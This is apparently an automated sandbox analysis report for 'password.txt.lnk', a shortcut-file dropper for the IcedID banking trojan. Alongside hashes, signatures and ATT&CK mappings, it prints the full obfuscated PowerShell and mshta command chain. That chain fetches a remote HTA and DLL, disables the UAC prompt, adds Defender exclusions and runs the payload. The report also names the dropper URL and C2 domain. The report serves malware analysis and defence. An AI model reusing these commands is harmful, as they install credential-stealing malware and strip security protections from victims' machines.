Overview

overview

10

Static

static

password.txt.lnk

windows7_x64

10

password.txt.lnk

windows10-2004_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-06-2022 16:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    password.txt.lnk

  • Size

    1KB

  • MD5

    ee5dc8a66298685a6f6790e32e1a006b

  • SHA1

    8bd4a8e15b8c097283b67dd8201ed41e01cbe794

  • SHA256

    65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd

  • SHA512

    8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c

Score
10/10
icedid3289900935bankerevasionloadersuricatatrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta

Extracted

Family

icedid

Campaign

3289900935

C2

ilzenhwery.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

    trojanbankericedid
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac
          4⤵
          • UAC bypass
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:328
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:2184

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

1
T1088

Defense Evasion

Bypass User Account Control

1
T1088

Disabling Security Tools

1
T1089

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    e1fb26de120faadab3c093b78644964f

    SHA1

    bb587dd3b1ad8384b6d612bc4bb806f41562982f

    SHA256

    e1ce351162cae7e8671f980192da54b8440d309985687d8eef56fec0b3180a85

    SHA512

    6e4d18e9506e72f90aea0c93d190b9817566bbbfa2409c1ae6ca98c2b81f8a2bd4204270ce951444d49dfc85c9f1b913952afe6b8fceea918dd97006cf322518

    Download Submit
  • C:\Users\Admin\AppData\Roaming\test.dll
    Filesize

    858KB

    MD5

    f0b052dad1a3605cd3e6d044cd315388

    SHA1

    fe3d8f50b494f400bd47842d580343f38be6a04b

    SHA256

    4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd

    SHA512

    c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b

    Download Submit
  • C:\Users\Admin\AppData\Roaming\test.dll
    Filesize

    858KB

    MD5

    f0b052dad1a3605cd3e6d044cd315388

    SHA1

    fe3d8f50b494f400bd47842d580343f38be6a04b

    SHA256

    4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd

    SHA512

    c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b

    Download Submit
  • memory/328-135-0x0000000000000000-mapping.dmp
    Download
  • memory/328-138-0x00007FF83E5B0000-0x00007FF83F071000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/328-142-0x00007FF83E5B0000-0x00007FF83F071000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/1164-134-0x00007FF83F280000-0x00007FF83FD41000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/1164-131-0x00000251D9940000-0x00000251D9962000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1164-130-0x0000000000000000-mapping.dmp
    Download
  • memory/2184-139-0x0000000000000000-mapping.dmp
    Download
  • memory/2184-143-0x0000000180000000-0x0000000180009000-memory.dmp
    Filesize

    36KB

    Download
  • memory/2688-132-0x0000000000000000-mapping.dmp
    Download